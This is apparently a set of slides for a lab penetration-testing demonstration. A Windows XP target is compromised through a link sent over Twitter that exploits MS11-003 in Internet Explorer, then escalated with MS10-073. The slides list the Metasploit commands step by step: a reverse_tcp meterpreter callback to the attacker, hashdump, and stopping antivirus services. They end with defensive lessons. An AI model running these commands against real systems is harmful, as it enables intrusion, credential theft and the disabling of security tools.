2. Scenario 2 : Topology
Target Firewall Attacker
Gateway
192.168.111.0/24 192.168.178.0/24
Target :
- Windows XP SP3 - User «test» has limited account profile
- IP : 192.168.111.129 - Default gateway : 192.168.111.128
- Antivirus : Ad-Aware Free / Windows Defender
- Local Windows Firewall activated
- Vulnerable to MS11-003 & MS10-073
Firewall Gateway :
- Eth0 : 192.168.111.128 (internal interface)
- Eth1 : 192.168.178.59 (external interface)
Attacker :
- IP : 192.168.178.21
3. Scenario 2 : Firewall rules
• Firewall administration by SSH only from internal network
• Internal network is allowed to request «Any» protocols to external network
4. Scenario 2 : Story-Board
✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB.
✤ Target has three active local countermeasure softwares : As you will see they don’t react to anything !
✤ Up-to-date Ad-Aware Free with default configuration.
✤ Windows Defender with default configuration.
✤ Windows Firewall with default configuration.
✤ Target is vulnerable to MS11-003 Internet Explorer vulnerability and to MS10-073 Keyboard Layout vulnerability
✤ MS11-003 will be our entry point
✤ MS10-073 our privileges escalation vector. (Stuxnet)
5. Scenario 2 : Story-Board
✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to
exploit Internet Explorer MS11-003 vulnerability.
✤ The target click on the provided link and MS11-003 is exploited. After the exploitation a reverse_tcp meterpreter
payload, on port 4444/TCP, is launched.
✤ Attacker will check the installed countermeasures, try to kill them without success, due to the limited privileges.
✤ Attacker has to check if these Microsoft patches are installed, in order to do the MS10-073 privilege escalation
✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)
✤ If any of these patches are installed the MS10-073 privilege escalation is not possible. winenum is the solution.
✤ Attacker will then execute the post exploitation MS10-073 privileges escalation.
✤ Attacker will stop the following services : Windows Defender / Lavasoft Ad-Aware Service
6. Scenario 2 : Metasploit commands
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
migrate X -> to another process
kill X -> 2 times -> notepad.exe & main iexplorer.exe processes
run getcountermeasure
run getcountermeasure -k
getuid
shell
echo %USERNAME%
getprivs
getsystem
hashdump
sysinfo
ipconfig
route
background
7. Scenario 2 : Metasploit commands
use post/windows/escalate/ms10_073_kbdlayout
set SESSION 1
run
sessions -i 1
getuid
migrate X -> to a «NT AUTHORITYSYSTEM» process
shell
echo %USERNAME%
net start
net stop "Lavasoft Ad-Aware Service"
net stop "Windows Defender"
net start
ps
8. Scenario 2 : Leasons Learned
•Update your OS and applications !
•Never click on unknown links, specialy shortened URL’s, from unknown sources !
•Don’t trust your antivirus ! Select antivirus how detect basic attacks !
•Don’t trust your Firewalls (Local or remote) !
•Don’t allow «Any» outbound protocols connexions from your internal network to
untrusted networks ! Limit your outbound connexions to your real needs.
8